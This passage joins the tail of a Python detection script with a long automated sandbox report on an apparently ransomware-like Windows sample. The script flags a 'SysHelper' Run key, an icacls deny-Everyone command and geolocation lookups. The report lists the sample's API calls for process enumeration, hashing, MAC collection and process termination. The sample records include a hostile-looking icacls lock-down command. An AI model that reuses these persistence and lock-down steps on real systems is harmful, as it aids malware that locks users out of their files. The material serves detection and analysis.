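    """Return all hits; a Run value and an icacls deny that name the same
    UUID directory are correlated, which is the strongest signal here."""
    hits = check_run_values(run_values) + check_command_lines(cmdlines) + check_http(requests)
    dirs_from_run = {h[2].rsplit("\\", 1)[0] for h in hits if h[0] == "run_key"}
    dirs_from_icacls = {h[1] for h in hits if h[0] == "icacls_deny_everyone"}
    shared = sorted(dirs_from_run & dirs_from_icacls)
    if shared:
        hits.append(("correlated", shared[0]))
    return hits


# Constructed sample records (not captured data); directory and user are made up.
SAMPLE_DIR = r"C:\Users\alice\AppData\Local\3f2c9a1e-6b7d-4e21-9c55-0a1b2c3d4e5f"
SAMPLE_RUN = {
    "SysHelper": (2, f'"{SAMPLE_DIR}\\NZPC0PFaC0.exe" --AutoStart'),
    "OneDrive": (1, r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
}
SAMPLE_CMDLINES = [
    f'icacls "{SAMPLE_DIR}" /deny *S-1-1-0:(OI)(CI)(DE,DC)',
    r'icacls "C:\Temp" /grant alice:F',
]
SAMPLE_HTTP = [
    ("api.2ip.ua", "/geo.json", "Microsoft Internet Explorer"),
    ("www.bing.com", "/", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_RUN, SAMPLE_CMDLINES, SAMPLE_HTTP):
        print(hit)
```

The Run-key check deliberately requires both the `SysHelper` name and a UUID directory in the data: either alone is a weak signal, and the icacls deny on the same directory is what ties the copy to the persistence entry.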

                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                      • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                      • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                      • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                      • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                      • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                      • API String ID: 3668891214-3807497772
                                                                                      • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                      • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004235B1
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                      • __gmtime64_s.LIBCMT ref: 00423680
                                                                                      • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                      • __allrem.LIBCMT ref: 004236F3
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                      • __allrem.LIBCMT ref: 00423726
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                      • __allrem.LIBCMT ref: 0042375B
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                      • __invoke_watson.LIBCMT ref: 004237EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                      • String ID:
                                                                                      • API String ID: 384356119-0
                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                        • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                        • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                      • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                      • String ID: i;B
                                                                                      • API String ID: 2427264223-472376889
                                                                                      • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                      • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                      • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                      • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __lock.LIBCMT ref: 0042FB7B
                                                                                        • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                        • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                      • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                        • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                        • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                        • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                        • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                        • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                        • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                      • String ID:
                                                                                      • API String ID: 360932542-0
                                                                                      • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                      • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                      • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                      • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _doexit.LIBCMT ref: 00427F47
                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                                                      • String ID:
                                                                                      • API String ID: 3712619029-0
                                                                                      • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                      • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                      • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                      • _memset.LIBCMT ref: 004110CA
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                      • _malloc.LIBCMT ref: 00411100
                                                                                      • _memset.LIBCMT ref: 0041110B
                                                                                      • _sprintf.LIBCMT ref: 0041112E
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 2451520719-213608013
                                                                                      • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                      • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetLastError.KERNEL32 ref: 00411915
                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                      • lstrcpyW.KERNEL32 ref: 00411962
                                                                                      • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                      • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                      • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                      • _memset.LIBCMT ref: 004119B8
                                                                                      • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                        • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                      • String ID: failed with error
                                                                                      • API String ID: 4182478520-946485432
                                                                                      • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                      • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                      • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                      • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                        • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                      • _memmove.LIBCMT ref: 0040F9EA
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                      • _memmove.LIBCMT ref: 0040FADA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                      • String ID:
                                                                                      • API String ID: 273148273-0
                                                                                      • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                      • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                      • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                      • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                      • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                      • _memset.LIBCMT ref: 0040E98E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                      • _sprintf.LIBCMT ref: 0040E9D3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1084002244-213608013
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                      • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                      • _memset.LIBCMT ref: 0040EBB4
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                      • _sprintf.LIBCMT ref: 0040EBF4
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1637485200-213608013
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0040E67F
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _malloc.LIBCMT ref: 0040E68B
                                                                                      • _wprintf.LIBCMT ref: 0040E69E
                                                                                      • _free.LIBCMT ref: 0040E6A4
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                      • _free.LIBCMT ref: 0040E6C5
                                                                                      • _malloc.LIBCMT ref: 0040E6CD
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                      • _sprintf.LIBCMT ref: 0040E720
                                                                                      • _wprintf.LIBCMT ref: 0040E732
                                                                                      • _wprintf.LIBCMT ref: 0040E73C
                                                                                      • _free.LIBCMT ref: 0040E745
                                                                                      Strings
                                                                                      • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                      • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                      • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                      • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                      • API String ID: 3901070236-1604013687
                                                                                      • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                      • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                        • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                      • _memmove.LIBCMT ref: 00410427
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                      • _memmove.LIBCMT ref: 00410514
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                      • String ID:
                                                                                      • API String ID: 273148273-0
                                                                                      • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                      • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                      • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                      • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                      • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                      • String ID: cmd.exe
                                                                                      • API String ID: 2696918072-723907552
                                                                                      • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
